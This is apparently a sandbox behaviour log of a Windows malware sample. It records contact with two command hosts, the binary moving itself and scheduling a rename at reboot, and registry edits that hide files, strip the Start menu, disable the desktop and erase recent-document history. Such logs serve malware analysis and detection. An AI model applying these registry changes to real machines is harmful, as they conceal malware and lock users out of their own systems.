\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\"LowRiskFileTypess" = .zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;.scr;
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  windoscarsep.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.7   Hostname:  windoscarsep.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.7
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  unocardgam.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.8   Hostname:  unocardgam.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.8
  Imagepath:  C:\2917522723.exe
1108
File
Cutpaste
Old Name:   C:\2917522723.exe
New Name:   C:\DOCUME~1\admin\LOCALS~1\Temp\UZ5uPYHL8nfdS6.exe.tmp
  Imagepath:  C:\2917522723.exe
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
Process ID: 1108   File Size: 328192
Malicious  Alert
Misc  Anomaly
Message:   Rootkit behavior observed    Detail:   Malware moves source binary   
API Call
  API Name:  GetLocalTime   Address:  0x00410df5
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemTime   Address:  0x00410dff
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\"PendingFileRenameOperations" = \??\C:\DOCUME~1\admin\LOCALS~1\Temp\UZ5uPYHL8nfdS6.exe.tmp null
1108
Malicious  Alert
Misc  Anomaly
Message:   Post reboot modification    Detail:   Malware scheduling files to be renamed upon reboot   
API Call
  API Name:  IsDebuggerPresent   Address:  0x5ad7b1ba
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Process
Terminated
C:\2917522723.exe
  Parentname:  C:\WINDOWS\system32\cmd.exe
  Command Line:  N/A
Process ID: 1108   Parent ID: 1228
API Call
  API Name:  GetSystemDirectoryA   Address:  0x74723c1f
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Params:  [0x00000114, 5000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x76fd8a1d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = cd 81 6f ce 39 e1 58 fc f5 90 7d 27 2c a7 1f 85 8d 7e d7 94 fd 03 b0 91 19 9a d6 31 b0 e7 0c f2 fe d3 cd f4 26 82 81 54 ff 73 25 d9 3d 56 ff f2 81 0e 3a bf da b8 99 50 04 15 5d 89 1c ce 18 fb 7b f0 aa d3 0f 98 e7 e2 2e d9 b1 93 2c 36 6b 36
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 66 9c 2f 8c de 8e d0 ab 81 60 5a 30 7f 95 bb 32 56 42 dc 57 4f ac 7b 7e c0 b8 cc 85 99 4e e3 97 f2 41 3e 75 78 39 f8 aa 48 3d 55 0a 1f a9 21 f7 b5 0e 93 3e a7 8e e5 af e0 73 4c 32 c9 0f 77 70 59 e1 4a 73 23 cf 19 c0 68 bf 26 49 e4 47 ea 8f
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = ab 9d ab 33 63 20 93 47 4e 5c db e7 42 34 95 ba 10 ac a4 2c 9d da eb 31 fe 5f b7 cc 4b f2 c5 aa c3 4a 39 b9 93 a6 99 de 0c 21 95 0b b1 68 8c 6f dd a6 a4 13 e7 b0 87 2e f6 26 b1 a6 08 5f 8c d1 f3 fd 63 62 a1 a3 93 62 8c 75 f2 ca fd 22 e3 17
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 08 8a 8a 3a d8 88 83 20 37 1e 40 57 85 ac f3 7f d3 da a5 fa ea ad ee 3f 5d e1 e6 d3 5c d8 c9 c0 a6 a9 90 8a c1 48 c8 95 62 62 db ab 55 49 2d 9c 47 d6 de 23 f2 96 dd 9e 47 6a 09 e6 26 3c 57 9f 7d b3 ac 7b c7 fb fc 58 82 2b 9e a8 08 82 d3 ff
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 03 09 d6 88 c0 e1 2d 3f 37 12 32 18 ed 94 23 ba 2a 8d b7 59 3e 22 27 44 b1 cf e6 ae 1a e7 47 4b 22 59 b4 ab 58 57 6d b6 09 6d af fb 56 49 ae 72 9d 90 eb aa f0 a7 31 44 8b d3 ec d9 04 31 da 66 a0 5d 57 6d 05 cd dd 1d d2 dc 5d 59 d2 a6 49 51
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = c8 fe 05 07 af 7f 65 c4 5e 78 31 b8 bb 1a 9e af 5c cd de 28 68 02 db 13 aa 5f ef 8c 00 21 7e f5 60 03 41 6e 8d c1 8c 83 d4 28 62 b2 f1 43 4e d4 0d 49 76 3e 95 84 25 f9 00 fa 11 dc 27 07 ca 72 2c c3 d2 e0 37 3e 09 d0 8a 17 f4 c1 a4 04 1a 5a
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = d1 37 3e f0 ce 85 07 16 50 4f 20 22 f8 a6 00 b1 50 dd 10 21 2d 85 81 12 fe 33 1f 86 cf 23 1f 4b 0e 73 28 43 7f 93 ee 39 a7 ad ea 65 e1 86 a9 16 c7 6e 01 6c 73 89 a7 43 25 ff 58 8a ad dc 6d 1e c3 78 6c 4c 15 ae 54 e1 9b 5f 2c 7d f4 30 8d c6
1436
Mutex
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1436
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040cf43
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d62
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040c8c6
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData" = C:\Documents and Settings\All Users\Application Data
1436
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x0040ce2d
  Params:  [0x00000238, 1]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\d6a5d877-16f5-4e5f-8588-91621c1b774c
1436
API Call
  API Name:  GetLocalTime   Address:  0x00410df5
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemTime   Address:  0x00410dff
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\"0df15996-87ec-4c84-a01b-a82c457edea3" =
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\"nsreg" = 0x4f224d82
1436
API Call
  API Name:  Sleep   Address:  0x00401567
  Params:  [300000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
5 Repeated items skipped
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
3 Repeated items skipped
API Call
  API Name:  Process32FirstW   Address:  0x0040cb67
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x004015a7
  Params:  [20000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d62
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\System\"DisableTaskMgr" = 0x00000000
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"DisableTaskMgr" = 0x00000000
1436
API Call
  API Name:  Sleep   Address:  0x004107f7
  Params:  [5000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Hidden" = 0x00000000
1436
Malicious  Alert
Misc  Anomaly
Message:   Malware trying to hide presence of files/folders    Detail:   Stealth capabilities detected   
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"ShowSuperHidden" = 0x00000000
1436
Malicious  Alert
Misc  Anomaly
Message:   Malware trying to hide presence of files    Detail:   Stealth capabilities detected   
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"TaskbarGlomming" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"TaskbarGlomLevel" = 0x00000002
1436
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\"HidNoChangingWallPaperden" = 0x00000001
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\"EnableAutoTray" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Recent" = C:\Documents and Settings\admin\Recent
1436
API Call
  API Name:  Sleep   Address:  0x0040278a
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x7792732c
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02e-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02c-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d62
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
11 Repeated items skipped
Regkey
Deleteval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\"Recent"
1436
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\New
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x7ca01765
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"NetHood" = C:\Documents and Settings\admin\NetHood
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x77f78648
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040278a
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\"@shell32.dll,-12691" = My Recent Documents
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Recent" = C:\Documents and Settings\admin\Recent
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xls
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.ppt
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.pdf
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.doc
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoDesktop" = 0x00000001
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowUser" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowControlPanel" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowHelp" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowMyComputer" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowMyDocs" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowMyMusic" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowMyGames" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowMyPics" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowPrinters" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowRecentDocs" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowRun" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowSearch" = 0x00000000
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowSetProgramAccessAndDefaults" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowNetConn" = 0x00000000
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Start_ShowNetPlaces" = 0x00000000
1436
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Taskband\"_Favorites" = 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\"Favorites" = ff
1436
API Call
  API Name:  Sleep   Address:  0x0040278a
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040b688
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x004027fc
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x763982de
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryA   Address:  0x755dd273
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x763982de
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
API Call
  API Name:  GetSystemDirectoryA   Address:  0x74723c1f
